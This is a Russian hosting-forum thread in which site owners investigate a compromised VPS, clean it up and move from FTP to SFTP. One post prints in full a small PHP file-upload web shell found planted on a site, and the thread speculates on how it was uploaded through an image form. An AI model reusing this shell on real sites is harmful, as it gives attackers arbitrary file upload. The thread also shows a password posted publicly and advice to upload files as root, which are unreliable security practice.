Взломанный сервер, чужие файлы на сайтах

вопросы по устройству ВДС, ресурсам, предустановленному софту и т.д.

Модераторы: Art.i, garry

Re: Взломанный сервер, чужие файлы на сайтах

Сообщение dmawzx » Вс апр 24, 2016 10:25 pm

Кстати, мануал хороший http://firstwiki.ru/index.php/%D0%9F%D0 ... 1%82%D0%B5

Пока всё зачистил и закрыл, поменял все пароли. Буду мониторить сервер и файлы на наличие новых изменений.
dmawzx
 
Сообщений: 23
Зарегистрирован: Ср ноя 21, 2012 1:47 pm

Re: Взломанный сервер, чужие файлы на сайтах

Сообщение swg » Вс апр 24, 2016 10:34 pm

И еще вариант, на будущее. Есть замечательная команда diff (в Windows она не настолько замечательна), хороша тем, что если вы имеете эталон (надо было сделать после установки) и не обновляли CMS то она быстро поможет выяснить где произошли несанкционированные изменения. Лучше, чтобы изменяемые файлы (загружаемые картинки, документы) находились в отдельной директории, большинство популярных CMS так и делают. Причину понять не даст, но вектор атаки будет понятен.
swg
флудит форум
 
Сообщений: 2384
Зарегистрирован: Сб окт 07, 2006 9:09 am
Откуда: NNov

Re: Взломанный сервер, чужие файлы на сайтах

Сообщение dmawzx » Вс апр 24, 2016 10:46 pm

Айболит (https://revisium.com/ai/) нашёл на сайте файл годовалой давности (прикрепил файл) внутри есть такой код:
Код: выделить все
<form enctype=multipart/form-data  method=post><input name=x type=file><input type=submit></form><?php isset($_FILES['x'])?(is_uploaded_file($_FILES['x']['tmp_name'])?(copy($_FILES['x']['tmp_name'],$_FILES['x']['name'])):0):0; echo($_FILES['x']['tmp_name']);echo('<br>');echo($_FILES['x']['name']);echo('<br>Is uploaded:');echo(file_exists($_FILES['x']['name']));?>

Вот такая вот дырень, буду искать остальное.
Вложения
img.zip
(5.51 KiB) Скачиваний: 101
dmawzx
 
Сообщений: 23
Зарегистрирован: Ср ноя 21, 2012 1:47 pm

Re: Взломанный сервер, чужие файлы на сайтах

Сообщение Mikanoshi » Пн апр 25, 2016 1:36 pm

Так и есть, аплоадер оказался дырявый. Все файлы в папке закачки должны открываться напрямую, без обработки php, даже если расширение php, как статика nginx-ом например.
И тем более скрипт закачки не должен позволять скрипты закачивать) Он что сигнатуру проверил, а расширение нет?
Mikanoshi
 
Сообщений: 205
Зарегистрирован: Сб май 02, 2009 2:03 pm

Re: Взломанный сервер, чужие файлы на сайтах

Сообщение dmawzx » Пн апр 25, 2016 1:42 pm

Это скрипт не мой, злодей его на сайте оставил, теперь надо выяснить как он этот файл на сервере разместил.
dmawzx
 
Сообщений: 23
Зарегистрирован: Ср ноя 21, 2012 1:47 pm

Re: Взломанный сервер, чужие файлы на сайтах

Сообщение swg » Пн апр 25, 2016 1:44 pm

Если это реальный код, который был изначально - то разработчик совсем ничего не понимает, однако, наиболее вероятно, что это уже последствие атаки.
swg
флудит форум
 
Сообщений: 2384
Зарегистрирован: Сб окт 07, 2006 9:09 am
Откуда: NNov

Re: Взломанный сервер, чужие файлы на сайтах

Сообщение Mikanoshi » Пн апр 25, 2016 2:15 pm

img.php в какой папке-то был, аплоада? Кто-то залил его через скрипт заливки изображений на сайте.
Mikanoshi
 
Сообщений: 205
Зарегистрирован: Сб май 02, 2009 2:03 pm

Re: Взломанный сервер, чужие файлы на сайтах

Сообщение dmawzx » Пн апр 25, 2016 2:25 pm

Этот файл лежал в папке /docs/img.php с другими php-файлами, собственно папка /docs/ была с простыми файлами содержащими только текст с различными инструкциями для посетителей. В прошлом году у меня была другая VDS-ка, её ещё тогда ломанули, видимо с тех пор скрипт и лежит и перекочевал на новый сервер. Загрузить такой скрипт через мои формы невозможно, даже если будет попытка это отобразится в панели управления сайта. В прошлом году, я думаю, получили доступ к серверу с помощью брутфорса, как думаете, сколько времени нужно, чтобы подобрать такой пароль: vH7K4IC0rXWI
dmawzx
 
Сообщений: 23
Зарегистрирован: Ср ноя 21, 2012 1:47 pm

Re: Взломанный сервер, чужие файлы на сайтах

Сообщение dmawzx » Пн апр 25, 2016 2:27 pm

Такой файл был только на одном сайте, на других с дырой ничего не нашел, хотя на других сайтах посторонние файлы тоже были. Вывод только один, у злодея был доступ к серверу, а может и до сих пор есть :)
dmawzx
 
Сообщений: 23
Зарегистрирован: Ср ноя 21, 2012 1:47 pm

Re: Взломанный сервер, чужие файлы на сайтах

Сообщение Mikanoshi » Пн апр 25, 2016 2:48 pm

dmawzx писал(а):сколько времени нужно, чтобы подобрать такой пароль: vH7K4IC0rXWI

Миллионы лет, если Bruteblock поставить =) Хотя и без с трудом верится, что такой пароль могли просто сбрутить.
dmawzx писал(а):Загрузить такой скрипт через мои формы невозможно, даже если будет попытка это отобразится в панели управления сайта

Да никто бы не стал в здравом уме, имея полный доступ, создавать шелл в виде кода, инжектированного в гифку и с расширением php))
Значит была форма для загрузки изображений, кто-то залил этот скрипт, затем скорее всего залил второй, который перенёс первый в папку docs и самоудалился.
Странно, что имя ему не поменяли, я бы сделал copyright.php какой-нибудь))
Mikanoshi
 
Сообщений: 205
Зарегистрирован: Сб май 02, 2009 2:03 pm

Re: Взломанный сервер, чужие файлы на сайтах

Сообщение ijkl » Пн май 01, 2017 11:19 pm

Mikanoshi писал(а):FTP правильно, что нужно отключить, оставить только SFTP
Как это сделать?
ijkl
 
Сообщений: 215
Зарегистрирован: Чт окт 03, 2013 5:42 pm

Re: Взломанный сервер, чужие файлы на сайтах

Сообщение dmawzx » Пн май 01, 2017 11:31 pm

ijkl писал(а):
Mikanoshi писал(а):FTP правильно, что нужно отключить, оставить только SFTP
Как это сделать?

Заходим в IPS manage в меню находим Службы, в службах отключаем proftpd
Я ещё все аккаунты FTP удалил :)
По хорошему можно вообще proftpd удалить.
dmawzx
 
Сообщений: 23
Зарегистрирован: Ср ноя 21, 2012 1:47 pm

Re: Взломанный сервер, чужие файлы на сайтах

Сообщение ijkl » Вт май 02, 2017 12:04 am

У меня стоит не proftpd, а pure-ftpd. Не понял, совсем что ли убрать ftp доступ? Мне так нельзя, я регулярно пользуюсь FTP доступом для закачки файлов. Как включить SFTP, если так можно?
ijkl
 
Сообщений: 215
Зарегистрирован: Чт окт 03, 2013 5:42 pm

Re: Взломанный сервер, чужие файлы на сайтах

Сообщение dmawzx » Вт май 02, 2017 12:13 am

ijkl писал(а):У меня стоит не proftpd, а pure-ftpd. Не понял, совсем что ли убрать ftp доступ? Мне так нельзя, я регулярно пользуюсь FTP доступом для закачки файлов. Как включить SFTP, если так можно?

FTP можно смело отключать.
Загружать файлы через рутовский логин и пароль. Есть такая программка winscp, поищи в Интернете. Можно и в ТоталКомандере просто переключить тип соединения на SFTP.
Я пользуюсь Дримвеаром с включённым SFTP, по папкам на сайтах лазать не приходится.
dmawzx
 
Сообщений: 23
Зарегистрирован: Ср ноя 21, 2012 1:47 pm

Re: Взломанный сервер, чужие файлы на сайтах

Сообщение ijkl » Вт май 02, 2017 12:30 am

dmawzx писал(а):Есть такая программка winscp
Правильно я понимаю, что он работает через SSH типа Putty? Через FileZilla можно? Уверены, что это безопаснее?
ijkl
 
Сообщений: 215
Зарегистрирован: Чт окт 03, 2013 5:42 pm

Пред.След.

Вернуться в Вопросы о работе сервера

Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 5